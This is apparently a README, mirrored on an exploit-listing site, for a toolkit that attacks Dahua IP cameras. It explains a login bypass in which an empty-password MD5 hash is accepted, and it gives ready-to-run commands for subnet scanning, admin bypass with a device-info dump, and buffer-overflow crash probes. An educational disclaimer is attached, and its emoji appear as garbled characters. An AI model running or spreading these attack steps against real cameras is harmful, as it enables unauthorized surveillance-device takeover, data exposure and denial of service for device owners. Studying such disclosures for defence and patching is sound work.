Share
## https://sploitus.com/exploit?id=FC6A38EF-E545-5264-8695-C080067BBCA9
# Dahua IP Camera CVE Exploit Tools
> โ ๏ธ **UNDER DEVELOPMENT** โ These scripts are based on published CVE details and require further testing against vulnerable devices to confirm full functionality.
Research and proof-of-concept scripts for four critical Dahua IP camera vulnerabilities.
---
## โ ๏ธ LEGAL DISCLAIMER
```
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
```
---
## CVEs Covered
| CVE | CVSS | Type | Status |
|-----|------|------|--------|
| **CVE-2021-33044** | 9.8 CRITICAL | Auth Bypass | CISA KEV (actively exploited) |
| **CVE-2021-33045** | 9.8 CRITICAL | Auth Bypass | CISA KEV (actively exploited) |
| **CVE-2025-31700** | 8.1 HIGH | Buffer Overflow DoS | Recent (2025) |
| **CVE-2025-31701** | 8.1 HIGH | Buffer Overflow DoS | Recent (2025) |
### CVE-2021-33044 & CVE-2021-33045 โ Authentication Bypass
- **CVSS:** 9.8 CRITICAL
- **CWE:** CWE-287 (Improper Authentication)
- **Mechanism:** RPC2 login accepts empty-password hash, granting admin access
- **Affected:** IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-*, VTO-*, VTH-*, NVR-*, XVR-*
- **Fixed in:** Firmware 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
- **References:**
- [NVD CVE-2021-33044](https://nvd.nist.gov/vuln/detail/CVE-2021-33044)
- [NVD CVE-2021-33045](https://nvd.nist.gov/vuln/detail/CVE-2021-33045)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
### CVE-2025-31700 & CVE-2025-31701 โ Buffer Overflow (DoS/RCE)
- **CVSS:** 8.1 HIGH
- **CWE:** CWE-120 (Buffer Copy Without Checking Size of Input)
- **Mechanism:** Oversized packets cause buffer overflow โ crash or potential RCE
- **References:**
- [NVD CVE-2025-31700](https://nvd.nist.gov/vuln/detail/CVE-2025-31700)
- [Dahua Security Advisory](https://dahuasecurity.com/aboutUs/trustedCenter/details/775)
---
## How the Auth Bypass Works
Dahua cameras use challenge-response authentication over `/RPC2_Login`:
```
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") โ EMPTY password
step2 = MD5("step1:random:step1")
```
Vulnerable firmware accepts the empty-password hash and returns a valid session token.
---
## Scripts
| File | Purpose | CVEs |
|------|---------|------|
| `dahua_scanner.py` | Network discovery โ find Dahua cameras on subnet | Detection |
| `dahua_exploit.py` | Multi-CVE scanner โ test all vulnerabilities | All |
| `dahua_auth_bypass.py` | Dedicated auth bypass with `--dump` option | CVE-2021-33044/45 |
| `dahua_rce.py` | Buffer overflow DoS probe | CVE-2025-31700/01 |
---
## Installation
```bash
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
```
---
## Usage
### Network Scanner
```bash
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
```
Common Dahua ports: `80, 8000, 8080, 8081, 8888, 9000, 443, 37777`
### Multi-CVE Exploit (Recommended)
```bash
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
```
### Auth Bypass
```bash
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass
```
### Buffer Overflow DoS
```bash
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only
```
โ ๏ธ **WARNING:** The DoS script may crash the target device.
---
## Dependencies
```
requests
```
All other imports are from Python standard library:
`socket`, `struct`, `hashlib`, `threading`, `ipaddress`, `argparse`, `json`
---
## Development Status
๐ง **UNDER ACTIVE DEVELOPMENT**
These scripts have been developed based on:
- Published CVE details from NVD
- Dahua Security Advisories
- Public PoC references (seclists.org, packetstormsecurity)
**Testing Status:**
- โ
Auth bypass logic implemented per CVE specifications
- โ
Buffer overflow payloads constructed per advisories
- โ ๏ธ Limited testing against live vulnerable devices
- โ ๏ธ Additional validation needed against diverse firmware versions
If you have access to vulnerable devices for testing, contributions and feedback are welcome.
---
## Contributing
1. Fork the repository
2. Create a feature branch
3. Test your changes
4. Submit a pull request
Please report any issues or false positives.
---
## References
- [NVD - CVE-2021-33044](https://nvd.nist.gov/vuln/detail/CVE-2021-33044)
- [NVD - CVE-2021-33045](https://nvd.nist.gov/vuln/detail/CVE-2021-33045)
- [NVD - CVE-2025-31700](https://nvd.nist.gov/vuln/detail/CVE-2025-31700)
- [NVD - CVE-2025-31701](https://nvd.nist.gov/vuln/detail/CVE-2025-31701)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Dahua Security Center](https://dahuasecurity.com/aboutUs/trustedCenter/details/775)
- [Bashis PoC - Seclists](http://seclists.org/fulldisclosure/2021/Oct/13)
---
## License
MIT License - See [LICENSE](LICENSE) file.
---
## Author
**Umair Aziz**
GitHub: [@umair-aziz025](https://github.com/umair-aziz025)
---
*For educational and authorized security research only.*